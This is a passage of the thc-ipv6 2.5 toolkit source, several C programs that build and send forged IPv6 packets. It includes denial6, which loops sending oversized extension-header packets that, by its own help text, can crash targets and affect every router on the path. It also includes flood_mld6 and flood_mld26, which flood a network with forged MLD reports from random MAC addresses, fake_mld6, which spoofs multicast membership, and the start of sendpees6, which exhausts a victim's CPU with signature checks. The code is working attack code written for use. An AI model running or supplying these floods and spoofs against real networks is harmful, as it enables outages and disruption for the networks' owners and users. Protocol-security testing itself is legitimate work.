-1; hdr = (thc_ipv6_hdr *) pkt; i = offset; hdr->pkt[4 + i] = 1; // set ip length to 0 hdr->pkt[5 + i] = 0; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: too small length field\t\t\t", count); memset(bla, count % 
256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; i = offset; hdr->pkt[4 + i] = 0; // set ip length to 0 hdr->pkt[5 + i] = 60; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: ping6 with bad checksum\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0x6666); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: ping6 with zero checksum\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0x6666); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; memset(hdr->pkt + hdr->pkt_len - 150 - 6, 0, 2); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if 
(check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: fragment missing\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, sizeof(bla) > 1400 ? 1400 : sizeof(bla), 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 128, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, hdr->pkt_len - 40 - offset - 22)) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; // more needed? 
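/******************* END OF TESTCASES ***************************/ if (noping == 0) { if (check_alive(p, interface, src6, dst6)) printf("Test %2d: normal ping6 (still alive?)\t\tPASSED - we got a reply\n", count); else printf("Test %2d: normal ping6 (still alive?)\t\tFAILED - target is unavailable now!\n", count); } thc_pcap_close(p); return ret_code; } thc-ipv6-2.5/inverse_lookup6.c0000644000000000000000000000654712251022440015020 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

int rawmode = 0;
unsigned char dmac[6], *mac;
int done = 0;

/* Print the usage text for this tool and terminate with exit code -1. */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s interface mac-address\n\n", prg);
  printf("Performs an inverse address query, to get the IPv6 addresses that are assigned\n");
  printf("to a MAC address. Note that only few systems support this yet.\n");
  exit(-1);
}

/*
 * Capture callback: report Inverse Neighbor Discovery advertisements.
 *
 * foo    - unused user pointer supplied by the capture loop
 * header - capture metadata; only caplen is read
 * data   - captured frame bytes
 *
 * The frame comes straight off the wire and is untrusted, so the captured
 * length is checked before any byte of the packet is indexed.
 */
void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *ptr = (unsigned char *) data;
  int len = header->caplen, i, j;

  (void) foo;

  /* Skip the link-layer header unless raw mode delivers bare IPv6 packets. */
  if (rawmode == 0) {
    if (do_hdr_size) {
      ptr += do_hdr_size;
      len -= do_hdr_size;
      /* A truncated capture leaves nothing to inspect after the link header. */
      if (len <= 0)
        return;
      /* Only IPv6 packets (version nibble 6) are of interest. */
      if ((ptr[0] & 240) != 0x60)
        return;
    } else {
      ptr += 14;
      len -= 14;
    }
  }
  if (len <= 0)
    return;

  if (debug)
    thc_dump_data(ptr, len, "Received Packet");

  /*
   * The checks below read ptr[6] and ptr[40] and the address list starts at
   * offset 56, so anything shorter cannot be a usable advertisement.
   */
  if (len < 56)
    return;

  if (ptr[6] == 0x3a && ptr[40] == ICMP6_INVNEIGHBORADV) {
    done = 1;
    /* Each advertised address occupies 16 bytes after offset 56. */
    j = (len - 56) / 16;
    if (j == 0) {
      printf("Empty Inverse Neighbor Discovery message received by %s for %s\n", thc_ipv62notation((char *) ptr + 8), mac);
    } else {
      printf("Inverse Advertisement Discovery message received by %s for %s (%d entries):\n", thc_ipv62notation((char *) ptr + 8), mac, j);
      for (i = 0; i < j; i++)
        printf("  %s\n", thc_ipv62notation((char *) ptr + 56 + i * 16));
    }
  }
}

/*
 * Entry point: argv[1] is the interface, argv[2] the MAC address to query.
 * Builds one inverse neighbor solicitation, sends it to ff02::1 and then
 * hands captured ICMPv6 traffic to check_packets().
 */
int main(int argc, char *argv[]) {
  unsigned char *pkt1 = NULL, buf[24];
  unsigned char *dst6 = NULL, *smac, dstmac[16] = "", *dmac = dstmac;
  unsigned int octet[6];
  int pkt1_len = 0, i;
  char *interface, string[64] = "icmp6";
  pcap_t *p;

  memset(buf, 0, sizeof(buf));

  if (argc != 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL)
    printf("WARNING: %s is not working with injection!\n", argv[0]);

  interface = argv[1];

  /*
   * Parse the MAC into unsigned int temporaries: "%x" stores a full
   * unsigned int, so pointing it at single bytes of the MAC buffer (as the
   * casts did before) wrote past each byte. Reject malformed input instead
   * of continuing with a partially filled address.
   */
  if (sscanf(argv[2], "%x:%x:%x:%x:%x:%x", &octet[0], &octet[1], &octet[2], &octet[3], &octet[4], &octet[5]) != 6) {
    fprintf(stderr, "Error: invalid MAC address %s\n", argv[2]);
    exit(-1);
  }
  for (i = 0; i < 6; i++) {
    if (octet[i] > 255) {
      fprintf(stderr, "Error: invalid MAC address %s\n", argv[2]);
      exit(-1);
    }
    dmac[i] = (unsigned char) octet[i];
  }
  mac = argv[2];

  if ((smac = thc_get_own_mac(interface)) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  dst6 = thc_resolve6("ff02::1");

  if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, NULL, dst6, 255, 0, 0, 0, 0)) == NULL)
    return -1;

  /* Two 8-byte options: type 1 carries our own MAC, type 2 the queried MAC. */
  memset(buf, 0, sizeof(buf));
  buf[0] = 0x01;
  buf[1] = 0x01;
  memcpy(buf + 2, smac, 6);
  buf[8] = 0x02;
  buf[9] = 0x01;
  memcpy(buf + 10, dmac, 6);

  if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_INVNEIGHBORSOL, 0, 0, (unsigned char *) &buf, 16, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, smac, dmac, pkt1, &pkt1_len) < 0) {
    fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
    exit(-1);
  }

  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  printf("Sending inverse packet for %s\n", argv[1]);
  thc_send_pkt(interface, pkt1, &pkt1_len);
  sleep(1);
  while (thc_pcap_check(p, (char *) check_packets, NULL));

  return 0;                     // never reached
}
thc-ipv6-2.5/flood_mld6.c0000644000000000000000000000513412251022436013707 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [target]\n\n", prg); printf("Flood the local network with MLD reports.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) {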
char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0"); unsigned char buf[6], buf2[16]; unsigned char *dst = thc_resolve6("ff02::2"), *dstmac = thc_get_multicast_mac(dst); int i; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; int count = 0; if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc > 2) if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: can not resolve %s\n", argv[2]); exit(-1); } mac[0] = 0x00; mac[1] = 0x18; ip6[9] = mac[1]; memset(buf, 0, sizeof(buf)); buf[0] = 5; buf[1] = 2; memset(buf2, 0, sizeof(buf2)); buf2[0] = 0xff; buf2[1] = 0x02; printf("Starting to flood network with MLD reports on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 0; i < 6; i++) buf2[10 + i] = rand() % 256; for (i = 0; i < 4; i++) mac[2 + i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD_REPORT, 0, 0, buf2, sizeof(buf2), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. 
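%d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/fake_mld6.c0000644000000000000000000001236212251022435013512 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

int rawmode = 0;
char *multicast6 = NULL;
int empty = 0;

/* Print the usage text for this tool and terminate with exit code -1. */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s [-l] interface add|delete|query [multicast-address [target-address [ttl [own-ip [own-mac-address [destination-mac-address]]]]]]\n\n", prg);
  printf("Ad(d)vertise or delete yourself - or anyone you want - in a multicast group of your choice\n");
  printf("Query ask on the network who is listening to multicast addresses\n");
  printf("Use -l to loop and send (in 5s intervals) until Control-C is pressed.\n");
//  printf("Use -r to use raw mode.\n\n");
  exit(-1);
}

/*
 * Parse a colon-separated MAC address from text into out[0..5].
 * Returns 0 on success and -1 when the text is not six hex octets.
 * Octets are scanned into unsigned int temporaries because "%x" always
 * stores a full unsigned int.
 */
static int parse_mac_arg(const char *text, unsigned char *out) {
  unsigned int octet[6];
  int n;

  if (sscanf(text, "%x:%x:%x:%x:%x:%x", &octet[0], &octet[1], &octet[2], &octet[3], &octet[4], &octet[5]) != 6)
    return -1;
  for (n = 0; n < 6; n++) {
    if (octet[n] > 255)
      return -1;
    out[n] = (unsigned char) octet[n];
  }
  return 0;
}

/*
 * Capture callback: print MLD reports seen on the wire.
 *
 * foo    - unused user pointer supplied by the capture loop
 * header - capture metadata; only caplen is read
 * data   - captured frame bytes
 *
 * The frame is untrusted input. The length is kept in an int (it used to be
 * an unsigned char, which silently wrapped for captures of 256 bytes or more)
 * and is checked before any packet byte is indexed.
 */
void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *ptr = (unsigned char *) data;
  int len = (int) header->caplen - 14;

  (void) foo;

  if (rawmode == 0)
    ptr += 14;
  if (do_hdr_size) {
    ptr += (do_hdr_size - 14);
    len -= (do_hdr_size - 14);
    /* A truncated capture leaves nothing to inspect after the link header. */
    if (len <= 0)
      return;
    /* Only IPv6 packets (version nibble 6) are of interest. */
    if ((ptr[0] & 240) != 0x60)
      return;
  }
  if (len <= 0)
    return;

  if (debug)
    thc_dump_data(ptr, len, "Received Packet");

  /* The multicast address read below ends at offset 72 (56 + 16). */
  if (len < 72)
    return;

  /*
   * Match: next header 0 (hop-by-hop), whose own next header is 0x3a
   * (ICMPv6), first option byte 5, and an ICMPv6 type of MLD report.
   */
  if (ptr[6] == 0 && ptr[40] == 0x3a && ptr[41] == 0 && ptr[42] == 5 && ptr[48] == ICMP6_MLD_REPORT)
    if (empty == 1 || memcmp(multicast6, ptr + 56, 16) == 0)
      printf("MLD Report: %s is listening on %s\n", thc_ipv62notation(ptr + 8), thc_ipv62notation(ptr + 56));
}

/*
 * Entry point. Positional arguments after the optional -r / -l switches:
 * interface, mode (add|delete|query), then optionally multicast address,
 * target address, ttl, own IP, own MAC and destination MAC.
 */
int main(int argc, char *argv[]) {
  unsigned char *pkt1 = NULL, buf[24];
  unsigned char *dst6 = NULL, *src6 = NULL, srcmac[16] = "", *mac = srcmac, dstmac[16] = "", *dmac = dstmac;
  int pkt1_len = 0;
  char *interface, string[64] = "ip6 and not udp and not tcp";
  int ttl = 1, mode = 0, wait = 0, loop = 0;
  pcap_t *p;

  memset(buf, 0, sizeof(buf));

  if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }
  if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-l") == 0) {
    loop = 1;
    argv++;
    argc--;
  }
  if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  interface = argv[1];
  if (strncasecmp(argv[2], "add", 3) == 0)
    mode = ICMP6_MLD_REPORT;
  if (strncasecmp(argv[2], "del", 3) == 0)
    mode = ICMP6_MLD_DONE;
  if (strncasecmp(argv[2], "que", 3) == 0) {
    mode = ICMP6_MLD_QUERY;
    wait = 0x0444 << 16;
  }
  if (mode == 0) {
    fprintf(stderr, "Error: no mode defined, specify add, delete or query\n");
    exit(-1);
  }

  if (argc == 3 || argv[3] == NULL || argv[3][0] == 0) {
    multicast6 = thc_resolve6("::");
    empty = 1;
  } else {
    if ((multicast6 = thc_resolve6(argv[3])) == NULL) {
      fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[3]);
      exit(-1);
    }
    /*
     * buf is still all zero here. Comparing against it detects "::" exactly;
     * summing the bytes through a plain char pointer could cancel out to 0
     * for a non-zero address where char is signed.
     */
    if (memcmp(multicast6, buf, 16) == 0)
      empty = 1;
  }

  /*
   * For every optional argument argc is tested BEFORE argv[n] is read:
   * argv[argc] is the terminating NULL and anything beyond it is outside
   * the argument vector.
   */
  if (argc > 4 && argv[4] != NULL)
    dst6 = thc_resolve6(argv[4]);
  else if (mode == ICMP6_MLD_QUERY) {
    if (memcmp(multicast6, buf, 16))
      dst6 = multicast6;
    else
      dst6 = thc_resolve6("ff02::1");
  } else
    dst6 = thc_resolve6("ff02::2");

  if (argc > 5 && argv[5] != NULL)
    ttl = atoi(argv[5]);
  if (argc > 6 && argv[6] != NULL)
    src6 = thc_resolve6(argv[6]);
  else
    src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK);

  if (rawmode == 0) {
    if (argc > 7 && argv[7] != NULL) {
      if (parse_mac_arg(argv[7], srcmac) < 0) {
        fprintf(stderr, "Error: invalid MAC address %s\n", argv[7]);
        exit(-1);
      }
    } else
      mac = thc_get_own_mac(interface);
    if (argc > 8 && argv[8] != NULL) {
      if (parse_mac_arg(argv[8], dstmac) < 0) {
        fprintf(stderr, "Error: invalid MAC address %s\n", argv[8]);
        exit(-1);
      }
    } else
      dmac = NULL;
  }

  if ((p = thc_pcap_init_promisc(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, src6, dst6, ttl, 0, 0, 0, 0)) == NULL)
    return -1;

  /* Hop-by-hop payload: option type 5, length 2, zero value. */
  memset(buf, 0, sizeof(buf));
  buf[0] = 5;
  buf[1] = 2;
  if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf, 6) < 0)
    return -1;

  memset(buf, 0, sizeof(buf));
  memcpy(buf, multicast6, 16);
  if (thc_add_icmp6(pkt1, &pkt1_len, mode, 0, wait, (unsigned char *) &buf, 16, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, mac, dmac, pkt1, &pkt1_len) < 0) {
    fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
    exit(-1);
  }

  printf("Sending packet%s for %s%s\n", loop ? "s" : "", empty ? "::" : argv[3], loop ? " (Press Control-C to end)" : "");
  do {
    thc_send_pkt(interface, pkt1, &pkt1_len);
    sleep(5);
    if (mode == ICMP6_MLD_QUERY)
      while (thc_pcap_check(p, (char *) check_packets, NULL));
  } while (loop);

  return 0;                     // never reached
}
thc-ipv6-2.5/denial6.c0000644000000000000000000001310112251022434013173 0ustar rootroot /* * Tests various known IPv6 vulnerabilities against a target.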
* */ #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define MAX_TEST 2 int rawmode = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface destination test-case-number\n\n", prg); printf("Performs various denial of service attacks on a target\n"); printf("If a system is vulnerable, it can crash or be under heavy load, so be careful!\n"); printf("If not test-case-number is supplied, the list of shown.\n"); // printf("Use -r to use raw mode.\n"); printf("\n"); exit(-1); } int main(int argc, char *argv[]) { int test = 0, count = 1, tmplen; unsigned char buf[65536], bla[1500], tests[256]; unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal; unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6]; thc_ipv6_hdr *hdr; int i, j, k, srcmtu, fragsize; unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL; int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500; char *interface; thc_ipv6_hdr *ipv6; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } interface = argv[1]; if ((dst6 = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: invalid target: %s\n", argv[2]); exit(-1); } //route6 = thc_resolve6("2a01::"); memcpy(ldst6, dst6, 16); memset(ldst6 + 2, 0, 6); ldst6[0] = 0xfe; ldst6[1] = 0x80; mcast6 = thc_resolve6("ff02::1"); if (argc >= 4) test = atoi(argv[3]); memset(null_buffer, 0, sizeof(null_buffer)); src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: invalid interface: %s\n", interface); exit(-1); } srcmac = thc_get_own_mac(interface); if (rawmode == 0) { if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for 
%s\n", argv[2]); exit(-1); } } else dstmac = null_buffer; if ((srcmtu = thc_get_mtu(interface)) <= 0) { fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface); exit(-1); } fragsize = ((srcmtu - 62) / 8) * 8; setvbuf(stdout, NULL, _IONBF, 0); memset(buf, 0, sizeof(buf)); memset(tests, 0, sizeof(tests)); memset(bla, 0, sizeof(bla)); if (test < 1 || test > MAX_TEST) { printf("%s %s (c) 2013 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface destination test-case-number\n\n", argv[0]); printf("The following test cases are currently implemented:\n"); printf(" 1 : large hop-by-hop header with router-alert and filled with unknown options\n"); printf(" 2 : large destination header filled with unknown options\n"); exit(0); } printf("Performing denial of service test case no. %d attack on %s via %s:\n", test, argv[2], argv[1]); printf("A \".\" is shown for every 1000 packets sent, press Control-C to end...\n"); /********************** TEST CASES ************************/ if (test == count) { // 1432 printf("Test %d: large hop-by-hop header with router-alert and filled with unknown options.\n", count); printf("WARNING: this attack affects all routers on the network path to the target!!\n"); sleep(3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 5; buf[1] = 2; j = 4; i = 2; while (j <= 1408) { k = (i % 63) + 1; buf[j] = k; switch (k) { case 38: // quickstart buf[j + 1] = 6; // length buf[j + 2] = 1; // request type + rate buf[j + 3] = 60; //qs-ttl buf[j + 4] = 8; // nonce j += 8; break; case 5: // prevent router alert option twice buf[j] = 1; // fall through default: buf[j + 1] = 2; j += 4; } j += buf[j + 1] + 2; i++; } for (i = 1; i < 236; i++) { buf[i * 6 - 2] = (i % 63) + 1; buf[i * 6 - 1] = 4; } if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 1416) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0); if 
(thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; } count++; if (test == count) { // 1432 printf("Test %d: large destination header filled with unknown options.\n", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; for (i = 1; i < 237; i++) { buf[6 + i * 6] = (i % 63) + 1; buf[5 + i * 6] = 4; } if (thc_add_hdr_dst(pkt, &pkt_len, buf, 1416) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; } count++; if (test == count) { // 1432 // code } count++; /******************* END OF TESTCASES ***************************/ count = 0; while (1) { thc_send_pkt(interface, pkt, &pkt_len); usleep(1); count++; if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/flood_mld26.c0000644000000000000000000000572412251022436013776 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define RECORD_NUMBER 8 void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [target]\n\n", prg); printf("Flood the local network with MLDv2 reports.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0"); unsigned char buf[6], buf2[RECORD_NUMBER * (4 + 16 + 16)]; unsigned char *dst = thc_resolve6("ff02::16"), *dstmac = thc_get_multicast_mac(dst); int i, j; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; int count = 0; if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) 
== NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc > 2) if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: can not resolve %s\n", argv[2]); exit(-1); } mac[0] = 0x00; mac[1] = 0x18; ip6[9] = mac[1]; memset(buf, 0, sizeof(buf)); buf[0] = 5; buf[1] = 2; memset(buf2, 0, sizeof(buf2)); for (i = 0; i < RECORD_NUMBER; i++) { buf2[0 + i * 36] = 3; // CHANGE_TO_INCLUDE_MODE buf2[3 + i * 36] = 1; buf2[4 + i * 36] = 0xff; buf2[5 + i * 36] = 0x02; memcpy(buf2 + 20 + i * 36, ip6, 16); } printf("Starting to flood network with MLDv2 reports on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 0; i < 4; i++) mac[2 + i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; for (i = 0; i < RECORD_NUMBER; i++) { for (j = 0; j < 6; j++) buf2[14 + j + i * 36] = rand() % 256; memcpy(buf2 + 29 + i * 36, ip6 + 9, 7); } count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD2_REPORT, 0, RECORD_NUMBER, buf2, sizeof(buf2), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. 
%d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/sendpees6.c0000644000000000000000000000417312251022441013554 0ustar rootroot#include #include #ifndef _HAVE_SSL int main() { fprintf(stderr, "Error: thc-ipv6 was compiled without openssl support, sendpees6 disabled.\n"); return -1; } #else #include #include #include #include #include #include "thc-ipv6.h" int main(int argc, char **argv) { thc_cga_hdr *cga_opt; thc_key_t *key; struct in6_addr addr6; unsigned char *pkt = NULL; unsigned char *dst6, *cga, *dev; char dummy[24], prefix[8], addr[50]; char dsthw[] = "\xff\xff\xff\xff\xff\xff"; char srchw[] = "\xdd\xde\xad\xbe\xef\xff"; int pkt_len = 0; if (argc != 5) { printf("sendpees6 by willdamn \n\n"); printf("Syntax: %s interface key_length prefix victim\n\n", argv[0]); printf("Send SEND neighbor solicitation messages and make target to verify a lota CGA and RSA signatures\n\n"); exit(1); } dev = argv[1]; if (thc_get_own_ipv6(dev, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", dev); exit(-1); } memcpy(addr, argv[3], 50); inet_pton(PF_INET6, addr, &addr6); memcpy(prefix, &addr6, 8); key = thc_generate_key(atoi(argv[2])); if (key == NULL) { printf("Couldn't generate key!"); exit(1); } cga_opt = thc_generate_cga(prefix, key, &cga); if (cga_opt == NULL) { printf("Error during CGA generation"); exit(1); } dst6 = thc_resolve6(argv[4]); memset(dummy, 'X', sizeof(dummy)); dummy[16] = 1; dummy[17] = 1; memcpy(dummy, dst6, 16); if ((pkt = thc_create_ipv6_extended(dev, PREFER_GLOBAL, &pkt_len, cga, dst6, 0, 0, 0, 0, 0)) == NULL) { printf("Cannot create IPv6 header\n"); exit(1); } if (thc_add_send(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0xfacebabe, 0x0, dummy, 24, cga_opt, key, NULL, 0) < 0) { printf("Cannot add SEND options\n"); exit(1); } free(cga_opt); if (thc_generate_pkt(dev, srchw, dsthw, pkt, &pkt_len) < 0) 
